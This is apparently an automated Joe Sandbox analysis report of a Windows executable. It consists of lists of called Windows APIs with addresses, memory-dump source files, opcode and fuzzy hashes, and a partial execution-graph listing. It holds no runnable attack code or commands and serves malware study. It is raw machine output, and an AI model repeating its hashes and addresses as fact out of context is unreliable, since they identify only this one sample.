                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: SystemTime
                                          • String ID: Svwo
                                          • API String ID: 2656138-368310346
                                          • Opcode ID: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
                                          • Instruction ID: 2fd9a68c0dbde603d2fbf043753412ebb29498d380aade495149b20e3fa82795
                                          • Opcode Fuzzy Hash: ea6675ebeb63a0a9a47573394461451ad3244f368073b02e8c46e04122ef07d3
                                          • Instruction Fuzzy Hash: 4FE04F21E0010A42C704ABA5CD435FDF7AEEB95600B044172A418E92E0F631C251C788
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405426,?,?,?,00000000,004055D8), ref: 00405237
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: eb3e0916f1d71d5523292608d7c4fdaba2307163a6013ecd43750e715832a1e9
                                          • Instruction ID: f191d8b0d38a375b14df503665a713a894c54af53dc9b6ff6a74be687c9ceae4
                                          • Opcode Fuzzy Hash: eb3e0916f1d71d5523292608d7c4fdaba2307163a6013ecd43750e715832a1e9
                                          • Instruction Fuzzy Hash: FDD05E7630D2502AE224559B2D85EBB4B9CCEC57A4F14407EF698D6241D2248C069F75
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetVersionExA.KERNEL32(?,004065BC,00000000,004065CA,?,?,?,?,?,00409840), ref: 00405CCE
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: c32652c1b1593bb30748bbc4056ea64814b159bbfb85160acb9b97b753e4a0b1
                                          • Instruction ID: 738d4c6cecaf4369c0bc5e2911b44b455e14ff8adc38ffec7b6cb45b6c001f0b
                                          • Opcode Fuzzy Hash: c32652c1b1593bb30748bbc4056ea64814b159bbfb85160acb9b97b753e4a0b1
                                          • Instruction Fuzzy Hash: FEC0126040470147E3105F319C01A1632D46744314F840539A9A4A13D1D77C80118A9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
                                          • Instruction ID: 11d40fada485c2470b6a3a131edfdc2b239a2a3c8694e8f38adb2eb1082f5e0b
                                          • Opcode Fuzzy Hash: 8d46861f72bd8009182a5df1658e23b09de12010c81d0541c91a6dece14fe47d
                                          • Instruction Fuzzy Hash: 59221D75E04219CFCB04CF99C980AEEBBB2FF88314F24416AD855B7345DB38A946CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00406F7D,?,0040BDC8), ref: 00406EA1
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406F7D,?,0040BDC8), ref: 00406EA7
                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00406F7D,?,0040BDC8), ref: 00406EF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseD5550HandleModule
                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                          • API String ID: 2067295843-2401316094
                                          • Opcode ID: 77f5281c4cd470c3d6529e739a59bc6e6209f341416de1e9850045565e45bd5b
                                          • Instruction ID: 6f0d4f6a2a682bef317bb0001553abdf6b97c4845b88f0a12c11f913521364e1
                                          • Opcode Fuzzy Hash: 77f5281c4cd470c3d6529e739a59bc6e6209f341416de1e9850045565e45bd5b
                                          • Instruction Fuzzy Hash: DF216F30A0020AABCB00EAA5DC52B9FB7B8AB44304F61447BA512F72C5DB78AA10865C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403BC2
                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403BE6
                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403C02
                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403C23
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403C4C
                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403C56
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403C76
                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403C8D
                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403CA8
                                          • GetLastError.KERNEL32(000000F5), ref: 00403CC2
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$HandlePointer$CloseErrorLastReadSizeType
                                          • String ID:
                                          • API String ID: 2587015848-0
                                          • Opcode ID: 82afb3ba326b040618bb1f5d1ace889cbe7170a3c7233cc425c4da9df6c52ac5
                                          • Instruction ID: e865e415cc3bddce3264ca3c3b1bb7a8c5c6c551cb095d29116a0d7d95c160d9
                                          • Opcode Fuzzy Hash: 82afb3ba326b040618bb1f5d1ace889cbe7170a3c7233cc425c4da9df6c52ac5
                                          • Instruction Fuzzy Hash: 8141A1712086009EF7344F258909B237DE8EB4471AF208A3FA5D6FA6E1D7BD9A05874D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055D8,?,?,?,?,00000000,00000000,00000000,?,004065B7,00000000,004065CA), ref: 004053AA
                                            • Part of subcall function 004051D8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,004052A3,?,00000000,00405382), ref: 004051F6
                                            • Part of subcall function 00405224: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405426,?,?,?,00000000,004055D8), ref: 00405237
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: InfoLocale$DefaultSystem
                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                          • API String ID: 1044490935-665933166
                                          • Opcode ID: 32e2cd6b4f7abd5ff8e1db0b88a9d00ca1a8aeb6f8e3409cce644bf8720f9a05
                                          • Instruction ID: 5dbce1740f669969ed804a55b507669df95a3cbb205332ef81c892f85f4d3f5c
                                          • Opcode Fuzzy Hash: 32e2cd6b4f7abd5ff8e1db0b88a9d00ca1a8aeb6f8e3409cce644bf8720f9a05
                                          • Instruction Fuzzy Hash: 90512D34B005487BDB04EBA59C81A9F77AADB88304F60947BB501BB3C7DA3DDA059B5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403796
                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004037A1
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004037B4
                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004037BE
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004037CD
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocString
                                          • String ID:
                                          • API String ID: 262959230-0
                                          • Opcode ID: eb62cbe69baa29a5e4c1cf22c4c0667e8de5313a1947b2c584ac2803d2fbc60e
                                          • Instruction ID: 4467adfd160ef2e886eef196ede4891b71e87803e826c11556a0c4038ec11822
                                          • Opcode Fuzzy Hash: eb62cbe69baa29a5e4c1cf22c4c0667e8de5313a1947b2c584ac2803d2fbc60e
                                          • Instruction Fuzzy Hash: A4F044A13442843AE56075A65C43FAB198CCB41B6AF10457FF704FA1C2D8B89D05927D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlUnwind.KERNEL32(?,00402DA8,?,00000000,0000000F,?,?,?,?), ref: 00402DA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Unwind
                                          • String ID: \[@$p[@
                                          • API String ID: 3419175465-328296950
                                          • Opcode ID: 10763b3ca4e2304a2a9a7d746383f13e1759796fccc72d9a9d1eb84cde97f303
                                          • Instruction ID: 4e34e1b9b67335c333c83c85b531455ae4cd4c13f1293b8a75d41d0fde5a4390
                                          • Opcode Fuzzy Hash: 10763b3ca4e2304a2a9a7d746383f13e1759796fccc72d9a9d1eb84cde97f303
                                          • Instruction Fuzzy Hash: 1E3160742042019FC714DF05CA88A27B7E5FF88714F1585BAE948AB3E1C775EC42DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlUnwind.KERNEL32(?,0040303C,00000000,00000000), ref: 00403037
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Unwind
                                          • String ID: d\@$p[@
                                          • API String ID: 3419175465-2501423739
                                          • Opcode ID: cf052ca5a1dfdc8996027feea02f07a474dc396ed8bdb9d7668b73762b1fe144
                                          • Instruction ID: cb865691cce5fd3c7a7f640cb22bbe848836da1b56ac3702cd8c9ca671f9cc7d
                                          • Opcode Fuzzy Hash: cf052ca5a1dfdc8996027feea02f07a474dc396ed8bdb9d7668b73762b1fe144
                                          • Instruction Fuzzy Hash: C31182352046029BD724DE18CA89B2777B5AB44744F24C13AA404AB3DAC77CDC41A7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00409836), ref: 004030E3
                                          • GetCommandLineA.KERNEL32(00000000,00409836), ref: 004030EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CommandHandleLineModule
                                          • String ID: U1hd.@
                                          • API String ID: 2123368496-2904493091
                                          • Opcode ID: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
                                          • Instruction ID: fc6106ec3918557feb9e8595d18864a5322139aa66bf0d8c86619f258e517ec6
                                          • Opcode Fuzzy Hash: dc37779357fa3c8f6d3c103c1a1d04ce0330030a2a249e6f734b52dac6989e3b
                                          • Instruction Fuzzy Hash: 04C002745413408AD76CAFB69E4A70A3994E785309F40883FA218BE3F1DB7C4605ABDD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:13%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:4.4%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:122
                                          execution_graph 45782 441484 45783 44148d 45782->45783 45784 44149b WriteFile 45782->45784 45783->45784 45785 4414a6 45784->45785 45786 414744 KiUserCallbackDispatcher 45787 413704 SetWindowLongA GetWindowLongA 45788 413761 SetPropA SetPropA 45787->45788 45789 413743 GetWindowLongA 45787->45789 45794 41f464 45788->45794 45789->45788 45790 413752 SetWindowLongA 45789->45790 45790->45788 45799 423cd4 45794->45799 45893 423b4c 45794->45893 45900 415338 45794->45900 45795 4137b1 45804 423d0a 45799->45804 45802 423db4 45805 423dbb 45802->45805 45806 423def 45802->45806 45803 423d55 45807 423d5b 45803->45807 45808 423e18 45803->45808 45816 423d2b 45804->45816 45907 423c30 45804->45907 45811 423dc1 45805->45811 45851 424079 45805->45851 45814 424162 IsIconic 45806->45814 45815 423dfa 45806->45815 45812 423d60 45807->45812 45813 423d8d 45807->45813 45809 423e33 45808->45809 45810 423e2a 45808->45810 45913 42425c 11 API calls 45809->45913 45817 423e40 45810->45817 45818 423e31 45810->45818 45820 423fdb SendMessageA 45811->45820 45821 423dcf 45811->45821 45823 423d66 45812->45823 45824 423ebe 45812->45824 45813->45816 45842 423da6 45813->45842 45843 423f07 45813->45843 45814->45816 45822 424176 GetFocus 45814->45822 45825 423e03 45815->45825 45826 42419e 45815->45826 45816->45795 45914 4242a4 IsIconic 45817->45914 45922 423c4c NtdllDefWindowProc_A 45818->45922 45820->45816 45821->45816 45853 423d88 45821->45853 45855 42401e 45821->45855 45822->45816 45828 424187 45822->45828 45829 423ee6 PostMessageA 45823->45829 45830 423d6f 45823->45830 45926 423c4c NtdllDefWindowProc_A 45824->45926 45833 4241b5 45825->45833 45825->45853 45945 424918 WinHelpA PostMessageA 45826->45945 45944 41f0bc GetCurrentThreadId 72E5AC10 45828->45944 45932 423c4c NtdllDefWindowProc_A 45829->45932 45837 423d78 45830->45837 45838 423f6d 45830->45838 45840 4241d3 45833->45840 45841 4241be 45833->45841 45846 423d81 45837->45846 45847 423e96 IsIconic 45837->45847 45848 423f76 45838->45848 45849 423fa7 45838->45849 45839 423f01 45839->45816 45952 4245f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 45840->45952 45946 42459c 45841->45946 45852 423ed3 45842->45852 45842->45853 45911 423c4c NtdllDefWindowProc_A 45843->45911 45845 42418e 45845->45816 45858 424196 SetFocus 45845->45858 45846->45853 45859 423e59 45846->45859 45861 423eb2 45847->45861 45862 423ea6 45847->45862 45934 423bdc LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 45848->45934 45937 423c4c NtdllDefWindowProc_A 45849->45937 45851->45816 45867 42409f IsWindowEnabled 45851->45867 45927 424240 45852->45927 45853->45816 45912 423c4c NtdllDefWindowProc_A 45853->45912 45855->45816 45879 424040 IsWindowEnabled 45855->45879 45857 423f0d 45865 423f4b 45857->45865 45866 423f29 45857->45866 45858->45816 45859->45816 45923 422d14 ShowWindow PostMessageA PostQuitMessage 45859->45923 45925 423c4c NtdllDefWindowProc_A 45861->45925 45924 423c88 29 API calls 45862->45924 45872 423b4c 6 API calls 45865->45872 45933 423bdc LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 45866->45933 45867->45816 45876 4240ad 45867->45876 45870 423fad 45877 423fc5 45870->45877 45938 41ef6c GetCurrentThreadId 72E5AC10 45870->45938 45880 423f53 PostMessageA 45872->45880 45874 423f90 45936 423c4c NtdllDefWindowProc_A 45874->45936 45875 423f7e 45875->45874 45935 41f020 6 API calls 45875->45935 45886 4240b4 IsWindowVisible 45876->45886 45884 423b4c 6 API calls 45877->45884 45878 423f31 PostMessageA 45878->45816 45879->45816 45885 42404e 45879->45885 45880->45816 45884->45816 45939 4123d8 21 API calls 45885->45939 45886->45816 45888 4240c2 GetFocus 45886->45888 45940 4182a8 45888->45940 45890 4240d7 SetFocus 45942 415308 45890->45942 45894 423bd5 45893->45894 45895 423b5c 45893->45895 45894->45795 45895->45894 45896 423b62 EnumWindows 45895->45896 45896->45894 45897 423b7e GetWindow GetWindowLongA 45896->45897 46110 423ae4 GetWindow 45896->46110 45898 423b9d 45897->45898 45898->45894 45899 423bc9 SetWindowPos 45898->45899 45899->45894 45899->45898 45901 415345 45900->45901 45902 4153a0 45901->45902 45903 4153ab 45901->45903 45906 4153a9 45901->45906 45902->45906 46114 415124 60 API calls 45902->46114 46113 424c54 13 API calls 45903->46113 45906->45795 45908 423c45 45907->45908 45909 423c3a 45907->45909 45908->45802 45908->45803 45909->45908 45953 4087b4 GetSystemDefaultLCID 45909->45953 45911->45857 45912->45816 45913->45816 45915 4242eb 45914->45915 45916 4242b5 SetActiveWindow 45914->45916 45915->45816 46082 423714 45916->46082 45920 4242d2 45920->45915 45921 4242e5 SetFocus 45920->45921 45921->45915 45922->45816 45923->45816 45924->45816 45925->45816 45926->45816 46095 41dbf8 45927->46095 45930 424258 45930->45816 45931 42424c LoadIconA 45931->45930 45932->45839 45933->45878 45934->45875 45935->45874 45936->45816 45937->45870 45938->45877 45939->45816 45941 4182b2 45940->45941 45941->45890 45943 415323 SetFocus 45942->45943 45943->45816 45944->45845 45945->45839 45947 4245c2 45946->45947 45948 4245a8 45946->45948 45951 402650 18 API calls 45947->45951 45949 4245d7 45948->45949 45950 4245af SendMessageA 45948->45950 45949->45816 45950->45949 45951->45949 45952->45839 46008 4085fc GetLocaleInfoA 45953->46008 45958 4085fc 19 API calls 45959 408809 45958->45959 45960 4085fc 19 API calls 45959->45960 45961 40882d 45960->45961 46020 408648 GetLocaleInfoA 45961->46020 45964 408648 GetLocaleInfoA 45965 40885d 45964->45965 45966 4085fc 19 API calls 45965->45966 45967 408877 45966->45967 45968 408648 GetLocaleInfoA 45967->45968 45969 408894 45968->45969 45970 4085fc 19 API calls 45969->45970 45971 4088ae 45970->45971 45972 403598 18 API calls 45971->45972 45973 4088bb 45972->45973 45974 4085fc 19 API calls 45973->45974 45975 4088d0 45974->45975 45976 403598 18 API calls 45975->45976 45977 4088dd 45976->45977 45978 408648 GetLocaleInfoA 45977->45978 45979 4088eb 45978->45979 45980 4085fc 19 API calls 45979->45980 45981 408905 45980->45981 45982 403598 18 API calls 45981->45982 45983 408912 45982->45983 45984 4085fc 19 API calls 45983->45984 45985 408927 45984->45985 45986 403598 18 API calls 45985->45986 45987 408934 45986->45987 45988 4085fc 19 API calls 45987->45988 45989 408949 45988->45989 45990 408966 45989->45990 45991 408957 45989->45991 45993 4035dc 4 API calls 45990->45993 46028 4035dc 45991->46028 45994 408964 45993->45994 45995 4085fc 19 API calls 45994->45995 45996 408988 45995->45996 45997 4089a5 45996->45997 45998 408996 45996->45998 46032 403548 45997->46032 45999 4035dc 4 API calls 45998->45999 46001 4089a3 45999->46001 46022 40377c 46001->46022 46009 408623 46008->46009 46010 408635 46008->46010 46036 403628 46009->46036 46012 4035dc 4 API calls 46010->46012 46013 408633 46012->46013 46014 403598 46013->46014 46015 40359c 46014->46015 46018 4035ac 46014->46018 46017 403604 18 API calls 46015->46017 46015->46018 46016 4035d8 46016->45958 46017->46018 46018->46016 46077 402668 46018->46077 46021 408664 46020->46021 46021->45964 46023 403784 46022->46023 46024 403604 18 API calls 46023->46024 46025 403797 46024->46025 46026 403598 18 API calls 46025->46026 46027 4037bf 46026->46027 46030 4035e0 46028->46030 46029 403602 46029->45994 46030->46029 46031 402668 4 API calls 46030->46031 46031->46029 46033 403567 46032->46033 46034 40354e 46032->46034 46033->46001 46034->46033 46035 402668 4 API calls 46034->46035 46035->46033 46041 403604 46036->46041 46038 403638 46039 403548 4 API calls 46038->46039 46040 403650 46039->46040 46040->46013 46042 403624 46041->46042 46043 403608 46041->46043 46042->46038 46046 402650 46043->46046 46045 403611 46045->46038 46047 402654 46046->46047 46049 40265e 46046->46049 46052 402090 46047->46052 46048 40265a 46048->46049 46063 403504 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46048->46063 46049->46045 46049->46049 46053 4020a4 46052->46053 46054 4020a9 46052->46054 46064 4019d4 RtlInitializeCriticalSection 46053->46064 46056 4020ce RtlEnterCriticalSection 46054->46056 46057 4020d8 46054->46057 46060 4020ad 46054->46060 46056->46057 46057->46060 46071 401f9c 46057->46071 46060->46048 46061 402203 46061->46048 46062 4021f9 RtlLeaveCriticalSection 46062->46061 46063->46049 46065 4019f8 RtlEnterCriticalSection 46064->46065 46066 401a02 46064->46066 46065->46066 46067 401a20 LocalAlloc 46066->46067 46068 401a3a 46067->46068 46069 401a89 46068->46069 46070 401a7f RtlLeaveCriticalSection 46068->46070 46069->46054 46070->46069 46074 401fac 46071->46074 46072 401fd8 46073 401dbc 9 API calls 46072->46073 46076 401ffc 46072->46076 46073->46076 46074->46072 46075 401f14 12 API calls 46074->46075 46074->46076 46075->46074 46076->46061 46076->46062 46078 40266c 46077->46078 46079 402676 46077->46079 46078->46079 46081 403504 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46078->46081 46079->46016 46079->46079 46081->46079 46091 4236c0 SystemParametersInfoA 46082->46091 46085 42372d ShowWindow 46087 423738 46085->46087 46088 42373f 46085->46088 46094 4236f0 SystemParametersInfoA 46087->46094 46090 423bdc LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 46088->46090 46090->45920 46092 4236de 46091->46092 46092->46085 46093 4236f0 SystemParametersInfoA 46092->46093 46093->46085 46094->46088 46098 41dc1c 46095->46098 46099 41dc02 46098->46099 46100 41dc29 46098->46100 46099->45930 46099->45931 46100->46099 46107 40cd38 19 API calls 46100->46107 46102 41dc46 46102->46099 46103 41dc60 46102->46103 46104 41dc53 46102->46104 46108 41be54 25 API calls 46103->46108 46109 41b450 19 API calls 46104->46109 46107->46102 46108->46099 46109->46099 46111 423b05 GetWindowLongA 46110->46111 46112 423b11 46110->46112 46111->46112 46113->45906 46114->45906 46115 46404c 46116 46405d 46115->46116 46117 464058 46115->46117 46118 46405b 46116->46118 46122 4635a8 46116->46122 46117->46118 46128 463ab8 46117->46128 46121 464071 46123 4635bb 46122->46123 46214 4636b4 46123->46214 46127 4635e4 46127->46121 46485 407988 46128->46485 46130 463f7a 46132 463fc6 46130->46132 46133 463f95 46130->46133 46131 463b0b 46131->46130 46134 463bd5 46131->46134 46137 4035dc 4 API calls 46131->46137 46138 4035dc 4 API calls 46132->46138 46136 4035dc 4 API calls 46133->46136 46135 463bf0 46134->46135 46139 463c2f 46134->46139 46140 4035dc 4 API calls 46135->46140 46141 463fa3 46136->46141 46142 463b5d 46137->46142 46143 463fd4 46138->46143 46147 403548 4 API calls 46139->46147 46144 463bfe 46140->46144 46518 462fbc 24 API calls 46141->46518 46488 414bb0 46142->46488 46519 462fbc 24 API calls 46143->46519 46149 414bb0 18 API calls 46144->46149 46151 463c2d 46147->46151 46153 463c1d 46149->46153 46150 463b7c 46154 40377c 18 API calls 46150->46154 46172 463d0f 46151->46172 46492 463468 46151->46492 46152 463fb1 46155 403548 4 API calls 46152->46155 46158 40377c 18 API calls 46153->46158 46159 463b8c 46154->46159 46156 463ff7 46155->46156 46161 403548 4 API calls 46156->46161 46157 463d8f 46163 403548 4 API calls 46157->46163 46158->46151 46162 414bb0 18 API calls 46159->46162 46167 463fff 46161->46167 46168 463ba0 46162->46168 46169 463d8d 46163->46169 46164 463c4f 46165 463c55 46164->46165 46166 463c8b 46164->46166 46170 4035dc 4 API calls 46165->46170 46173 403548 4 API calls 46166->46173 46171 403568 4 API calls 46167->46171 46168->46134 46178 414bb0 18 API calls 46168->46178 46501 463824 46169->46501 46174 463c63 46170->46174 46175 46400c 46171->46175 46172->46157 46176 463d50 46172->46176 46177 463c89 46173->46177 46498 471af8 46174->46498 46175->46118 46181 4035dc 4 API calls 46176->46181 46189 4636b4 48 API calls 46177->46189 46182 463bc5 46178->46182 46185 463d5e 46181->46185 46186 40377c 18 API calls 46182->46186 46184 463c79 46187 40377c 18 API calls 46184->46187 46188 414bb0 18 API calls 46185->46188 46186->46134 46187->46177 46190 463d7d 46188->46190 46191 463cb2 46189->46191 46194 40377c 18 API calls 46190->46194 46197 463d11 46191->46197 